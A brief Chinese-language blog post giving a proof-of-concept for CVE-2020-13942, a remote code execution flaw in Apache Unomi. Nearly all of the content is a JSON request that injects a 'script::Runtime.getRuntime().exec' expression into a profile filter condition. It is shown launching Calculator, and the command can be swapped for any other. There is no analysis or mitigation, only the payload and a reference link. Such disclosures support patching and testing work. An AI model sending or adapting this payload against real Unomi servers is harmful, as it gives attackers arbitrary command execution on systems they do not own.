# CVE-2020-13942 Apache Unomi 远程代码执行
PoC:
“`json
{“filters”:[{“id” : “pyn3rd”,”filters”: [{“condition”: {“parameterValues”: {“pyn3rd”: “script::Runtime.getRuntime().exec(‘open -a Calculator’)”},”type”:”profilePropertyCondition”}}]}],”sessionId”: “pyn3rd”}
“`
![](/static/lingjiao/media/16097302096726/16097302307813.jpg)
ref:
https://twitter.com/pyn3rd/status/1328920545442680837
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容